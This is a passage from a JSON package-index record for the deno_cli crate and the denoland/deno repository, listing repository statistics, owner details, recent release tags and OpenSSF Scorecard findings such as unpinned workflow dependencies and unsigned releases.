deno_cli","documentation_url":"https://docs.rs/deno_cli/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13"